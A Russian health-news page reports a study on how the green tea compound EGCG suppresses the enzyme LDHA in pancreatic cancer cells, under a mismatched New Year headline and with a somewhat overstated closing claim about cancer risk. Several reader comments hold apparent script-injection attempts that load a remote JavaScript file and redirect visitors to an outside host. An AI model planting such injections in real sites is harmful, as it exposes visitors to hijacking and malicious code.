Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Что налить мужу на Новый ...  >>  Что налить мужу на Новый год – ученые нашли ответ!
 
Обратная связь
 

Что налить мужу на Новый год – ученые нашли ответ!

Размер шрифта
23 декабря 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Зеленому чаю не зря приписывают множество полезных свойств. Он не только является антиоксидантом, но и может помочь в борьбе с раком: оказывается, один из входящих в его состав компонентов способен замедлять рост опухолевых клеток.

Что налить мужу на новый год – ученые нашли ответ!

Принято считать, что зеленый чай наделен целебными свойствами – он может оказывать положительный эффект при раке и некоторых других заболеваниях. Ученые решили понять, действительно ли это так, а также как именно должен действовать зеленый чай, чтобы снизить риск развития рака или же замедлить рост опухолевых клеток.

Все данные по этому вопросу были опубликованы в статье в журнале Metabolomics. Оказалось, что EGCG, активный биологический компонент зеленого чая, меняет обмен веществ клеток рака поджелудочной железы благодаря подавлению фермента LDHA, который связан с развитием опухоли. Ученые также выяснили, что блокатор этого фермента, оксамат, который снижает активность LDHA, действует аналогичным образом: нарушает обмен веществ раковых клеток.

«Ученые были уверены, что для поиска лекарства от рака им необходимо изучить процессы на молекулярном уровне. Однако результаты нашей работы говорят о том, что можно изменить саму систему обмена веществ и тем самым повлиять на развитие раковой опухоли», – рассказывает доктор Вай-Нанг Ли из Института биомедицинских исследований в Лос-Анджелесе. «Понимание того, каким образом активный компонент зеленого чая может предотвратить развитие рака, поможет нам осознать влияние и других продуктов питания на рост опухолевых клеток».

Ученые обнаружили, что EGCG нарушает так называемый «поток» в метаболизме раковой клетки. Поток – это скорость оборота молекул в пути обмена веществ. EGCG действует подобно оксамату, который является давно известным блокатором LDHA. Ученые пришли к выводу, что и EGCG и оксамат снижают риск развития рака благодаря подавлению активности LDHA, важного фермента в метаболизме опухолевой клетки.

«Это совершенно новый взгляд на процесс обмена веществ», – говорит доктор Ли. «Теперь мы понимаем, как метаболизм опухолевой клетки может быть нарушен, и можем использовать эти знания для разработки новых методов лечения».

Так что зеленый чай, безусловно, полезен для нашего организма – про него определенно не стоит забывать всем тем, кто ведет здоровый образ жизни.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:27

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 21:25

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:22

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

4 - Гость

08 июля 2015 в 21:54

Комментарий удален за нарушение Правил общения

5 - Гость

08 июля 2015 в 21:55

Комментарий удален за нарушение Правил общения

Статьи

       
Как часто есть   Суперпродукты до и после застолья   Какой напиток не позволит вам ослепнуть?!   Узнайте, будет ли у вас рак в течение 10 лет  
23 июля 2013Из лысых крыс сделают лекарство от рака 07 июня 2013Поможет ли зеленый чай похудеть?
 
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 

Слайдшоу

1
5 напитков, которые защитят ваше сердце
Еда против рака. Часть 2
Как решить все проблемы за 90 секунд. Часть 2

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.